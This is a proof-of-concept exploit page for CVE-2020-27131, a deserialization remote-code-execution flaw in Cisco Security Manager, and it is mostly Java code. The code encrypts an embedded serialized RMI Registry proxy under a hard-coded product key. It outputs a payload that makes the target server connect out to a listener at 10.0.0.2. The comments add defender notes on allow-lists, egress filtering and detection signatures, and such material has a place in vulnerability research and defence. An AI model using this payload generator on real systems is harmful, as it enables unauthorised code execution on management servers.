# CVE-2020-27131 Cisco Security Manager 反序列化RCE漏洞
==POC==
import java.security.InvalidKeyException;
import java.util.Base64;

import com.cisco.nm.cmf.security.jaas.BlobCrypt;

/**
 * Proof-of-concept listing for CVE-2020-27131: encrypts a Java-serialized
 * object with {@code BlobCrypt} under a fixed 16-byte key and prints the
 * resulting blob as Base64.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>The key is a constant in this listing. NOTE(review): presumably it is
 *       the same static key shipped in the product; confirm against the
 *       vendor advisory. A key that is identical on every installation gives
 *       the receiver no assurance about who produced a blob, so decrypting
 *       successfully must never be treated as proof the content is trusted.</li>
 *   <li>The plaintext is a native Java serialization stream. Any code path
 *       that decrypts such a blob and passes it to
 *       {@code ObjectInputStream.readObject()} needs a class allow-list
 *       ({@code ObjectInputFilter}) or a non-native format.</li>
 *   <li>The embedded stream carries an RMI endpoint, so deserializing it
 *       would make the receiving host open an outbound connection; egress
 *       filtering and alerting on unexpected outbound connections from the
 *       management server are relevant controls alongside the vendor fix.</li>
 * </ul>
 */
public class JaasEncryptor {

    public static void main(String[] args) {
        // Base64 of a Java serialization stream: "rO0AB" is the encoded form
        // of the stream header bytes AC ED 00 05, a useful signature when
        // inspecting decrypted blobs or captured traffic. The stream describes
        // a java.lang.reflect.Proxy for java.rmi.registry.Registry backed by a
        // UnicastRef whose host field is the private address 10.0.0.2.
        final String serializedB64 = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

        final Base64.Decoder b64Decoder = Base64.getDecoder();
        final Base64.Encoder b64Encoder = Base64.getEncoder();

        final byte[] serialized = b64Decoder.decode(serializedB64);

        // Fixed 16-byte key, hard-coded rather than derived per installation.
        final byte[] blobKey = {
            -100, 76, -23, 87, 125, 0, 5, 94,
            12, 76, 37, -84, 36, 78, 123, 5
        };

        final byte[] cipherBlob = BlobCrypt.encryptArray(serialized, blobKey);
        final String cipherB64 = b64Encoder.encodeToString(cipherBlob);
        System.out.println("Encrypted payload: " + cipherB64);

        // The decrypted bytes are never read or compared; presumably this call
        // is only a round-trip sanity check that the blob decrypts under the
        // same key without throwing.
        final byte[] roundTrip = BlobCrypt.decryptArray(cipherBlob, blobKey);
    }
}